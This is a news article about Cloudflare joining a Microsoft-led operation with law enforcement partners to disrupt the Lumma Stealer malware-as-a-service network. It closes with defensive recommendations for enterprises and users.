26-05-2025
Cloudflare Helps Disrupt Lumma Stealer Malware Network
Home » Emerging technologies » Cyber Security » Cloudflare Helps Disrupt Lumma Stealer Malware Network
Cloudflare has announced its participation in a coordinated effort to disrupt the Lumma Stealer malware operation.
The company's Cloudforce One and Trust and Safety teams worked alongside Microsoft and other partners to target Lumma Stealer, also known as LummaC2. This malware is part of a growing category of information-stealing tools posing serious risks to individuals and organizations.
Lumma Stealer exfiltrates credentials, cryptocurrency wallets, cookies, and other sensitive data from infected systems. The stolen data often fuels downstream criminal activities, including financial fraud, identity theft, and ransomware attacks.
Reportedly, the malware abused multiple infrastructure providers, including Cloudflare. In response, Cloudflare identified the abuse and joined a Microsoft-led takedown operation.
This disruption involved several private partners, including those impacted and those offering intelligence support. It also included cooperation from the U.S. Department of Justice, Europol's European Cybercrime Center (EC3), and Japan's Cybercrime Control Center (JC3).
According to Cloudflare, the operation denied Lumma Stealer operators access to: Their command-and-control panel and stolen data marketplace
The infrastructure used to collect and manage data
This action has increased operational and financial pressure on Lumma operators and their customers, forcing them to rebuild their malware services elsewhere.
Lumma Stealer is a Malware-as-a-Service platform. It allows cybercriminals to rent an admin panel, retrieve stolen data, and generate custom malware builds for global distribution.
The malware spreads mainly through social engineering. Victims are lured into downloading and executing the payload via fake messages or ads.
To mitigate Lumma Stealer threats, experts recommend a layered defense. The malware evolves quickly and often uses malvertising, phishing, and compromised software.
Cloudflare revealed several key security recommendations for enterprises and users: Block users from downloading executables and scripts from untrusted sources
Use reputable endpoint detection tools and apply application allow listing
Disable or restrict PowerShell and unsigned macros
Additionally, users should avoid saving passwords in browsers, clear autofill data, and disable autofill for sensitive information. Regular software updates and DNS filtering are also critical.
Enterprises should monitor for unusual connections, rare domain access, and suspicious script activity. Email and web filtering tools can also block malicious links and drive-by downloads.
Finally, user training is vital. Educating users about scareware, fake installers, and PowerShell misuse can help prevent infections and strengthen defenses against Lumma Stealer.
